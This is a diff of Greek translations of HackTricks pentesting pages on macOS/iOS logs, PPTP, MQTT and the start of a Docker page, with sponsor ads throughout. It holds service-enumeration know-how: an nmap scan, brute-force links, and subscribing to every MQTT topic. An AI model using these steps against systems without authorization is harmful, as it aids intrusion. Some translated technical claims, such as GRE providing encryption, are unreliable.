Μπορείτε να ελέγξετε την **κονσόλα του macOS** ή το **`log`** cli για να ελέγξετε τα αρχεία καταγραφής του macOS.\
|
||||
Μπορείτε να ελέγξετε τη **κονσόλα macOS** ή το **`log`** cli για να ελέγξετε τα αρχεία καταγραφής του macOS.\
|
||||
Μπορείτε επίσης να ελέγξετε τα αρχεία καταγραφής από το iOS χρησιμοποιώντας το **`idevicesyslog`**.\
|
||||
Ορισμένα αρχεία καταγραφής θα παραλείπουν πληροφορίες προσθέτοντας **`<private>`**. Για να εμφανίσετε όλες τις πληροφορίες, πρέπει να εγκαταστήσετε ένα προφίλ από [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) για να ενεργοποιήσετε αυτές τις ιδιωτικές πληροφορίες.
|
||||
Ορισμένες καταγραφές θα παραλείπουν πληροφορίες προσθέτοντας **`<private>`**. Για να εμφανιστούν όλες οι πληροφορίες, πρέπει να εγκαταστήσετε κάποιο προφίλ από [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) για να ενεργοποιήσετε αυτές τις ιδιωτικές πληροφορίες.
|
||||
|
||||
Αν δεν ξέρετε τι να κάνετε:
|
||||
```sh
|
||||
|
@ -391,38 +346,53 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
|
|||
|
||||
killall -9 logd
|
||||
```
|
||||
Μπορείτε να ελέγξετε τα ατυχήματα στα εξής:
|
||||
Μπορείτε να ελέγξετε τα κρασαρίσματα σε:
|
||||
|
||||
* **iOS**
|
||||
* Ρυθμίσεις → Απόρρητο → Αναλυτικά & Βελτιώσεις → Δεδομένα αναλυτικών
|
||||
* Ρυθμίσεις → Απορρήτου → Αναλύσεις & Βελτιώσεις → Δεδομένα Ανάλυσης
|
||||
* `/private/var/mobile/Library/Logs/CrashReporter/`
|
||||
* **macOS**:
|
||||
* `/Library/Logs/DiagnosticReports/`
|
||||
* `~/Library/Logs/DiagnosticReports`
|
||||
|
||||
{% hint style="warning" %}
|
||||
Το iOS αποθηκεύει μόνο 25 ατυχήματα της ίδιας εφαρμογής, οπότε πρέπει να τα καθαρίσετε αλλιώς το iOS θα σταματήσει να δημιουργεί ατυχήματα.
|
||||
Το iOS αποθηκεύει μόνο 25 κρασαρίσματα της ίδιας εφαρμογής, οπότε πρέπει να το καθαρίσετε αυτό, αλλιώς το iOS θα σταματήσει να δημιουργεί κρασαρίσματα.
|
||||
{% endhint %}
|
||||
|
||||
## Frida Android Οδηγοί
|
||||
## Οδηγοί Frida Android
|
||||
|
||||
{% content-ref url="../android-app-pentesting/frida-tutorial/" %}
|
||||
[frida-tutorial](../android-app-pentesting/frida-tutorial/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Συμμετάσχετε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,30 +1,44 @@
|
|||
# 1723 - Πεντεστινγκ PPTP
|
||||
# 1723 - Ελεγχος Ευπαθειών PPTP
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ τρικς σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **Point-to-Point Tunneling Protocol (PPTP)** είναι μια μέθοδος που χρησιμοποιείται ευρέως για τη **απομακρυσμένη πρόσβαση** σε φορητές συσκευές. Χρησιμοποιεί τη **θύρα TCP 1723** για την ανταλλαγή κλειδιών, ενώ το **πρωτόκολλο IP 47** (Generic Routing Encapsulation, ή **GRE**), χρησιμοποιείται για την κρυπτογράφηση των δεδομένων που μεταδίδονται μεταξύ των συνδέσεων. Αυτή η ρύθμιση είναι κρίσιμη για τη δημιουργία ενός ασφαλούς καναλιού επικοινωνίας μέσω του διαδικτύου, εξασφαλίζοντας ότι τα ανταλλαγμένα δεδομένα παραμένουν εμπιστευτικά και προστατευμένα από μη εξουσιοδοτημένη πρόσβαση.
|
||||
Το **Πρωτόκολλο Σημείου προς Σημείο Συνάρτησης (PPTP)** είναι μια μέθοδος που χρησιμοποιείται ευρέως για τη **απομακρυσμένη πρόσβαση** σε κινητές συσκευές. Χρησιμοποιεί τη **θύρα TCP 1723** για την ανταλλαγή κλειδιών, ενώ το **πρωτόκολλο IP 47** (Γενική Ενθυλάκωση Δρομολόγησης, ή **GRE**), χρησιμοποιείται για την κρυπτογράφηση των δεδομένων που μεταδίδονται μεταξύ των συνομιλητών. Αυτή η ρύθμιση είναι κρίσιμη για τη δημιουργία ενός ασφαλούς καναλιού επικοινωνίας στο διαδίκτυο, εξασφαλίζοντας ότι τα ανταλλασσόμενα δεδομένα παραμένουν εμπιστευτικά και προστατευμένα από μη εξουσιοδοτημένη πρόσβαση.
|
||||
|
||||
**Προεπιλεγμένη Θύρα**: 1723
|
||||
**Προεπιλεγμένη Θύρα**:1723
|
||||
|
||||
## Απαρίθμηση
|
||||
```bash
|
||||
nmap –Pn -sSV -p1723 <IP>
|
||||
```
|
||||
### [Βίαιη Δύναμη](../generic-methodologies-and-resources/brute-force.md#pptp)
|
||||
### [Επίθεση Βίας](../generic-methodologies-and-resources/brute-force.md#pptp)
|
||||
|
||||
## Ευπάθειες
|
||||
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
|
||||
|
@ -32,14 +46,14 @@ nmap –Pn -sSV -p1723 <IP>
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,22 +1,36 @@
|
|||
# 1883 - Ελεγχος διείσδυσης στο MQTT (Mosquitto)
|
||||
# 1883 - Ελέγχος Εισβολής στο MQTT (Mosquitto)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το **MQ Telemetry Transport (MQTT)** είναι γνωστό ως ένα **πρωτόκολλο μηνυμάτων δημοσίευσης/συνδρομής** που ξεχωρίζει για την ακραία απλότητα και ελαφρότητά του. Αυτό το πρωτόκολλο είναι σχεδιασμένο ειδικά για περιβάλλοντα όπου οι συσκευές έχουν περιορισμένες δυνατότητες και λειτουργούν σε δίκτυα που χαρακτηρίζονται από χαμηλό εύρος ζώνης, υψηλή καθυστέρηση ή αναξιόπιστες συνδέσεις. Οι βασικοί στόχοι του MQTT περιλαμβάνουν την ελαχιστοποίηση της χρήσης της δικτυακής ζώνης και τη μείωση της ζήτησης στους πόρους της συσκευής. Επιπλέον, στοχεύει στη διατήρηση αξιόπιστης επικοινωνίας και στην παροχή ενός συγκεκριμένου επιπέδου διασφάλισης παράδοσης. Αυτοί οι στόχοι καθιστούν το MQTT εξαιρετικά κατάλληλο για τον αναπτυσσόμενο τομέα της **επικοινωνίας μηχανής προς μηχανή (M2M)** και το **Διαδίκτυο των Πραγμάτων (IoT)**, όπου είναι ουσιώδες να συνδέονται αποτελεσματικά μια πληθώρα συσκευών. Επιπλέον, το MQTT είναι υψίστης ωφέλειας για κινητές εφαρμογές, όπου η διατήρηση της ζώνης ζώνης και της διάρκειας ζωής της μπαταρίας είναι κρίσιμη.
|
||||
Το **MQ Telemetry Transport (MQTT)** είναι γνωστό ως ένα πρωτόκολλο **δημοσίευσης/συνδρομής μηνυμάτων** που ξεχωρίζει για την ακραία απλότητα και ελαφρότητά του. Αυτό το πρωτόκολλο είναι σχεδιασμένο ειδικά για περιβάλλοντα όπου οι συσκευές έχουν περιορισμένες δυνατότητες και λειτουργούν σε δίκτυα που χαρακτηρίζονται από χαμηλό εύρος ζώνης, υψηλή καθυστέρηση ή αναξιόπιστες συνδέσεις. Οι βασικοί στόχοι του MQTT περιλαμβάνουν την ελαχιστοποίηση της χρήσης της δικτυακής ζώνης και τη μείωση της ζήτησης στους πόρους της συσκευής. Επιπλέον, στοχεύει στη διατήρηση αξιόπιστης επικοινωνίας και στην παροχή ενός συγκεκριμένου επιπέδου διασφάλισης παράδοσης. Αυτοί οι στόχοι καθιστούν το MQTT εξαιρετικά κατάλληλο για τον αναπτυσσόμενο τομέα της **επικοινωνίας μηχανής προς μηχανή (M2M)** και του **Διαδικτύου των Πραγμάτων (IoT)**, όπου είναι ουσιώδες να συνδέονται αποτελεσματικά μια πληθώρα συσκευών. Επιπλέον, το MQTT είναι υψίστης ωφέλειας για τις κινητές εφαρμογές, όπου η διατήρηση της ζώνης ζώνης και της διάρκειας ζωής της μπαταρίας είναι κρίσιμη.
|
||||
|
||||
**Προεπιλεγμένη θύρα:** 1883
|
||||
```
|
||||
|
@ -36,11 +50,11 @@ PORT STATE SERVICE REASON
|
|||
```
|
||||
![](<../.gitbook/assets/image (973).png>)
|
||||
|
||||
### [**Χαμηλότερη Εξαναγκαστική Είσοδος MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
|
||||
### [**Χαμηλής Πιθανότητας Επίθεση Brute-Force στο MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
|
||||
|
||||
## Ελεγχος Εισόδου MQTT
|
||||
## Ελεγχος Εισβολής στο MQTT
|
||||
|
||||
**Η ταυτοποίηση είναι εντελώς προαιρετική** και ακόμα κι αν γίνεται ταυτοποίηση, **η κρυπτογράφηση δεν χρησιμοποιείται από προεπιλογή** (οι διαπιστεύσεις στέλνονται σε καθαρό κείμενο). Οι επιθέσεις MITM μπορούν ακόμα να εκτελεστούν για να κλέψουν κωδικούς πρόσβασης.
|
||||
**Η ταυτοποίηση είναι εντελώς προαιρετική** και ακόμα και αν γίνεται ταυτοποίηση, **η κρυπτογράφηση δεν χρησιμοποιείται από προεπιλογή** (οι διαπιστεύσεις στέλνονται σε καθαρό κείμενο). Οι επιθέσεις MITM μπορούν ακόμα να εκτελεστούν για να κλέψουν κωδικούς πρόσβασης.
|
||||
|
||||
Για να συνδεθείτε σε έναν υπηρεσία MQTT μπορείτε να χρησιμοποιήσετε: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) και να εγγραφείτε σε όλα τα θέματα κάνοντας:
|
||||
```
|
||||
|
@ -91,9 +105,9 @@ main()
|
|||
|
||||
Το μοντέλο δημοσίευσης/εγγραφής αποτελείται από:
|
||||
|
||||
* **Εκδότης**: δημοσιεύει ένα μήνυμα σε ένα (ή πολλαπλά) θέμα(τα) στον μεσίτη.
|
||||
* **Συνδρομητής**: εγγράφεται σε ένα (ή πολλαπλά) θέμα(τα) στον μεσίτη και λαμβάνει όλα τα μηνύματα που στέλνονται από τον εκδότη.
|
||||
* **Μεσίτης**: δρομολογεί όλα τα μηνύματα από τους εκδότες προς τους συνδρομητές.
|
||||
* **Εκδότης**: δημοσιεύει ένα μήνυμα σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη.
|
||||
* **Συνδρομητής**: εγγράφεται σε ένα (ή πολλαπλά) θέμα(τα) στο μεσίτη και λαμβάνει όλα τα μηνύματα που στέλνει ο εκδότης.
|
||||
* **Μεσίτης**: δρομολογεί όλα τα μηνύματα από τους εκδότες στους συνδρομητές.
|
||||
* **Θέμα**: αποτελείται από έναν ή περισσότερους επίπεδους που διαχωρίζονται με μια κάθετο (π.χ., /smartshouse/livingroom/temperature).
|
||||
|
||||
### Μορφή Πακέτου <a href="#f15a" id="f15a"></a>
|
||||
|
@ -109,7 +123,7 @@ main()
|
|||
* PUBLISH (3): Χρησιμοποιείται για να στείλει ένα μήνυμα από τον πελάτη στον εξυπηρετητή ή αντίστροφα.
|
||||
* PUBACK (4): Αναγνώριση ενός πακέτου PUBLISH.
|
||||
* PUBREC (5): Μέρος ενός πρωτοκόλλου παράδοσης μηνύματος που εξασφαλίζει τη λήψη του μηνύματος.
|
||||
* PUBREL (6): Επιπλέον επιβεβαίωση στην παράδοση μηνύματος, υποδεικνύοντας απελευθέρωση μηνύματος.
|
||||
* PUBREL (6): Επιπλέον εγγύηση στην παράδοση μηνύματος, υποδεικνύοντας απελευθέρωση μηνύματος.
|
||||
* PUBCOMP (7): Τελικό μέρος του πρωτοκόλλου παράδοσης μηνύματος, υποδεικνύοντας ολοκλήρωση.
|
||||
* SUBSCRIBE (8): Αίτημα του πελάτη για να ακούσει μηνύματα από ένα θέμα.
|
||||
* SUBACK (9): Η αναγνώριση του εξυπηρετητή για ένα αίτημα SUBSCRIBE.
|
||||
|
@ -124,9 +138,21 @@ main()
|
|||
|
||||
* `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των απαγωγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους **δωρεάν** στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -134,6 +160,6 @@ main()
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,32 +1,48 @@
|
|||
# 2375, 2376 Ελεγχος Ευπαθειών Docker
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
